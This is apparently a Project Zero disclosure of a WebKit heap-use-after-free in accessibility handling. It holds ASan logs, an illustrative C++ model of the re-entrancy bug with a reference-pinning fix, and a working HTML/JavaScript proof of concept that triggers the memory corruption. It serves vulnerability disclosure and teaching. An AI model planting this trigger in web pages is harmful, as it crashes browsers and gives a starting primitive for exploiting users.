SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a) in WebCore::Node::nextSibling() const
Shadow bytes around the buggy address:
0x1c1800016db0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x1c1800016dc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c1800016dd0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x1c1800016de0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x1c1800016df0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x1c1800016e00: fa fa fa fa fa fa fa fa fd fd fd fd fd fd[fd]fd
0x1c1800016e10: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
0x1c1800016e20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c1800016e30: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c1800016e40: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x1c1800016e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==29516==ABORTING
=================================================================
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1245
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on an ASan build of WebKit nightly.
Note that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.
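The ASan log below shows the shape of the bug: AccessibilityRenderObject::handleAriaExpandedChanged() asks AXObjectCache::getOrCreate() for an ancestor's accessibility object, initialising that object walks its children, the child lookup forces Document::resolveStyle(), the RenderTreeUpdater tears down the img's renderer (its style was dirtied by the removeProperty() call in the PoC), RenderObject::willBeDestroyed() calls AXObjectCache::remove(), and the AccessibilityRenderObject the caller is still holding is freed before it reads from it. The C++ program below is an added illustrative model of that re-entrancy pattern and its usual fix; it is not WebKit source. The class and function names are stand-ins chosen to mirror the frames in the log, the liveness registry is instrumentation so the program reports the dangling read instead of performing it, and the hardened variant shows the general remedy of holding a reference across any call that can re-enter style resolution.

```cpp
// Added illustrative model of the bug class in the trace (not WebKit code):
// an accessibility cache that can be emptied by style resolution re-entered
// from its own getOrCreate(). Names mirror frames in the ASan log but are stand-ins.
#include <cstdio>
#include <map>
#include <set>

// Instrumentation: which AXObjects are alive, so the example can report a
// would-be use-after-free instead of dereferencing freed memory.
static std::set<const void*> g_liveAXObjects;

struct RenderObject {                 // stand-in for WebCore::RenderObject
    int id = 0;
    bool needsStyleRecalc = false;    // dirtied by the PoC's removeProperty() call
};

struct AXObject {                     // stand-in for WebCore::AccessibilityRenderObject
    explicit AXObject(RenderObject* r) : renderer(r) { g_liveAXObjects.insert(this); }
    ~AXObject() { g_liveAXObjects.erase(this); }
    RenderObject* renderer;
    bool expanded = false;
    unsigned refCount = 1;            // the cache owns this initial reference
    void ref() { refCount += 1; }
    void deref() { refCount -= 1; if (refCount == 0) delete this; }
};

class AXRef {                         // minimal RefPtr: holds one reference for its lifetime
public:
    explicit AXRef(AXObject* p) : m_p(p) { m_p->ref(); }
    ~AXRef() { m_p->deref(); }
    AXRef(const AXRef&) = delete;
    AXRef& operator=(const AXRef&) = delete;
    AXObject* get() const { return m_p; }
    AXObject* operator->() const { return m_p; }
private:
    AXObject* m_p;
};

struct Document;

class AXObjectCache {                 // stand-in for WebCore::AXObjectCache
public:
    explicit AXObjectCache(Document& doc) : m_doc(doc) {}
    ~AXObjectCache() { for (auto& kv : m_objects) kv.second->deref(); }
    AXObject* getOrCreate(RenderObject* r);     // may re-enter style resolution
    void remove(RenderObject* r) {              // RenderObject::willBeDestroyed() path
        auto it = m_objects.find(r);
        if (it == m_objects.end()) return;
        AXObject* obj = it->second;
        m_objects.erase(it);
        obj->deref();                           // if this was the last reference, obj is freed
    }
private:
    Document& m_doc;
    std::map<RenderObject*, AXObject*> m_objects;
};

struct Document {                     // stand-in for Document + RenderTreeUpdater
    std::map<int, RenderObject> renderers;
    AXObjectCache cache{*this};
    void resolveStyle() {             // tears down dirty renderers, which removes their AX objects
        for (auto& kv : renderers)
            if (kv.second.needsStyleRecalc) {
                kv.second.needsStyleRecalc = false;
                cache.remove(&kv.second);
            }
    }
};

AXObject* AXObjectCache::getOrCreate(RenderObject* r) {
    auto it = m_objects.find(r);
    if (it != m_objects.end()) return it->second;
    AXObject* obj = new AXObject(r);
    m_objects[r] = obj;
    // init() of a new object determines its role by walking its children, and
    // the child lookup forces Document::resolveStyle() first (frames #13 to #23 in the log).
    m_doc.resolveStyle();
    return obj;
}

enum class Outcome { Ok, UseAfterFree };

// Vulnerable shape: a raw pointer to our own AX object is kept across a lookup
// that can re-enter style resolution and free it.
Outcome handleAriaExpandedChangedUnsafe(Document& doc, RenderObject* self, RenderObject* parent) {
    AXObject* selfObj = doc.cache.getOrCreate(self);
    doc.cache.getOrCreate(parent);              // may free selfObj
    // Real code would read selfObj->expanded here; consult the registry instead.
    if (!g_liveAXObjects.count(selfObj)) return Outcome::UseAfterFree;
    return Outcome::Ok;
}

// Hardened shape: pin the object for the duration of the call, so the cache's
// deref() can no longer be the last one.
Outcome handleAriaExpandedChangedSafe(Document& doc, RenderObject* self, RenderObject* parent) {
    AXRef selfObj(doc.cache.getOrCreate(self));
    doc.cache.getOrCreate(parent);              // removes selfObj from the cache, but it stays alive
    if (!g_liveAXObjects.count(selfObj.get())) return Outcome::UseAfterFree;
    bool expanded = selfObj->expanded;          // safe read
    (void)expanded;
    return Outcome::Ok;
}

// Reproduces the PoC's shape: a <dl> whose <img> child has just had its style
// dirtied (removeProperty("-webkit-appearance")) before aria-expanded is set.
Outcome runScenario(bool hardened) {
    Document doc;
    RenderObject& dl = doc.renderers[1];  dl.id = 1;
    RenderObject& img = doc.renderers[2]; img.id = 2;
    doc.cache.getOrCreate(&img);          // img's AX object already exists (allocation site in the log)
    img.needsStyleRecalc = true;
    return hardened ? handleAriaExpandedChangedSafe(doc, &img, &dl)
                    : handleAriaExpandedChangedUnsafe(doc, &img, &dl);
}

int main() {
    std::printf("raw pointer across getOrCreate: %s\n",
                runScenario(false) == Outcome::UseAfterFree ? "use-after-free" : "ok");
    std::printf("pinned with a reference:        %s\n",
                runScenario(true) == Outcome::UseAfterFree ? "use-after-free" : "ok");
    return 0;
}
```

The point the model makes is that the cache entry and the object's lifetime are the same thing: once a lookup can run arbitrary teardown (here, synchronous style resolution), every caller that keeps a pointer across that lookup needs its own reference, and an ASan build is the cheapest way to find the callers that do not.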
PoC:
=================================================================
-->
<style>
#div { visibility: collapse }
</style>
<script>
function eventhandler() {
document.execCommand("bold", false);
img.style.removeProperty("-webkit-appearance");
img.setAttribute("aria-expanded", "false");
}
</script>
<div id="div">
<dl>
<canvas>aaa</canvas>
<img id="img" src="x" style="-webkit-appearance: relevancy-level-indicator;" onerror="eventhandler()">
<!--
=================================================================
ASan log:
=================================================================
==29817==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000aa7a0 at pc 0x00010b892ab9 bp 0x7fff5edcdf80 sp 0x7fff5edcdf78
READ of size 8 at 0x6080000aa7a0 thread T0
==29817==WARNING: invalid path to external symbolizer!
==29817==WARNING: Failed to use and restart external symbolizer!
#0 0x10b892ab8 in WebCore::AccessibilityRenderObject::handleAriaExpandedChanged() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5fab8)
#1 0x10c14c041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)
#2 0x10c152268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)
#3 0x10c15207c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)
#4 0x10c14b8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)
#5 0x10c14b6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)
#6 0x10cd8fb93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)
#7 0x10cd815d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)
#8 0x10cd81441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)
#9 0x235a91e01027 (<unknown module>)
#10 0x10859434a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#11 0x10859434a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#12 0x10858d91a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)
#13 0x1081f2757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)
#14 0x1081743da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)
#15 0x1077ac0f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)
#16 0x1077ac362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)
#17 0x1077ac6d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)
#18 0x10ca26a15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)
#19 0x10cdba510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)
#20 0x10c1bb68e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e)
#21 0x10c1bb170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170)
#22 0x10c182d77 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94fd77)
#23 0x10c183d0f in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x950d0f)
#24 0x10c183733 in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x950733)
#25 0x10c7b0af1 in WebCore::ImageLoader::dispatchPendingErrorEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xf7daf1)
#26 0x10c7b0c4a in WebCore::EventSender<WebCore::ImageLoader>::dispatchPendingEvents() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xf7dc4a)
#27 0x10bfa20d4 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f0d4)
#28 0x10c3479ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)
#29 0x10c344d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)
#30 0x10bfc0493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)
#31 0x10c5345c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)
#32 0x10c05f093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)
#33 0x10c01e386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)
#34 0x10baad997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
#35 0x10baa72aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
#36 0x10e42ec41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
#37 0x1018d02eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
#38 0x1018d3689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
#39 0x1018d2ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
#40 0x101173683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
#41 0x100f1d3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)
#42 0x100f26888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)
#43 0x108c20312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)
#44 0x108c20d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)
#45 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)
#46 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)
#47 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)
#48 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)
#49 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#50 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#51 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#52 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)
#53 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)
#54 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)
#55 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)
#56 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
#57 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
#58 0x100e2e56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
#59 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)
0x6080000aa7a0 is located 0 bytes inside of 88-byte region [0x6080000aa7a0,0x6080000aa7f8)
freed by thread T0 here:
#0 0x103e1a294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
#1 0x108c67f30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)
#2 0x10ba0dfda in WebCore::AXObjectCache::remove(unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dafda)
#3 0x10ba1176e in WebCore::AXObjectCache::remove(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1de76e)
#4 0x10de9fc0b in WebCore::RenderObject::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266cc0b)
#5 0x10dd1d9c8 in WebCore::RenderElement::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24ea9c8)
#6 0x10dea012f in WebCore::RenderObject::destroy() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266d12f)
#7 0x10dfffd8f in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType)::$_2::operator()(unsigned int) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ccd8f)
#8 0x10dffe2dc in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cb2dc)
#9 0x10dffd1de in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca1de)
#10 0x10dffcc4d in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9c4d)
#11 0x10dffc47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)
#12 0x10bfa17e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)
#13 0x10ba0cc58 in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9c58)
#14 0x10b84e516 in WebCore::AccessibilityNodeObject::addChildren() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1b516)
#15 0x10b897caf in WebCore::AccessibilityRenderObject::addChildren() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x64caf)
#16 0x10b86a69e in WebCore::AccessibilityObject::updateChildrenIfNecessary() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3769e)
#17 0x10b86a512 in WebCore::AccessibilityObject::children(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37512)
#18 0x10b84e02c in WebCore::AccessibilityNodeObject::insertChild(WebCore::AccessibilityObject*, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1b02c)
#19 0x10b897c01 in WebCore::AccessibilityRenderObject::addChildren() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x64c01)
#20 0x10b86a69e in WebCore::AccessibilityObject::updateChildrenIfNecessary() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3769e)
#21 0x10b86a512 in WebCore::AccessibilityObject::children(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37512)
#22 0x10b83fc55 in WebCore::AccessibilityList::determineAccessibilityRole() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcc55)
#23 0x10b84c66e in WebCore::AccessibilityNodeObject::init() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1966e)
#24 0x10ba0ed91 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbd91)
#25 0x10b892810 in WebCore::AccessibilityRenderObject::handleAriaExpandedChanged() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5f810)
#26 0x10c14c041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)
#27 0x10c152268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)
#28 0x10c15207c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)
#29 0x10c14b8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)
previously allocated by thread T0 here:
#0 0x103e19d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
#1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
#2 0x108c71ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)
#3 0x108c66c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)
#4 0x108bfc437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)
#5 0x108bfb768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)
#6 0x10b835a08 in WTF::RefCounted<WebCore::AccessibilityObject>::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a08)
#7 0x10b881ef9 in WebCore::AccessibilityRenderObject::create(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4eef9)
#8 0x10ba0fe5d in WebCore::createFromRenderer(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dce5d)
#9 0x10ba0ec59 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbc59)
#10 0x10ba0cb6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)
